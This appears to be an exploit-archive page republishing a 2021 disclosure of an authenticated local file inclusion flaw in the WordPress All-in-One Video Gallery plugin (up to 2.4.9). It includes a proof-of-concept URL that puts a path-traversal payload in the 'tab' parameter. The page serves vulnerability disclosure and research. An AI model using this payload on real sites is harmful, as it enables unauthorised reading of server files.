Wordpress plugin allinone video gallery plugin 2.4.9 local file inclusion (lfi) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-12-03 | Type : webapps | Platform : php
This exploit / vulnerability Wordpress plugin allinone video gallery plugin 2.4.9 local file inclusion (lfi) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)
# Exploit Author: Mohamed Magdy Abumusilm Aka m19o
# Software: All-in-One Video Gallery plugin
# Version: <= 2.4.9
# Tested on: Windows,linux

Poc: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc

Decription : Authenticated user can exploit LFI vulnerability in tab parameter.

Vulnerable code block : https://i.ibb.co/hXRcSQp/1123.png

You can find a writeup at my blog : https://m19o.github.io/posts/How-i-found-my-first-0day/

Wordpress plugin allinone video gallery plugin 2.4.9 local file inclusion (lfi)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Wordpress plugin allinone video gallery plugin 2.4.9 local file inclusion (lfi) Vulnerability / Exploit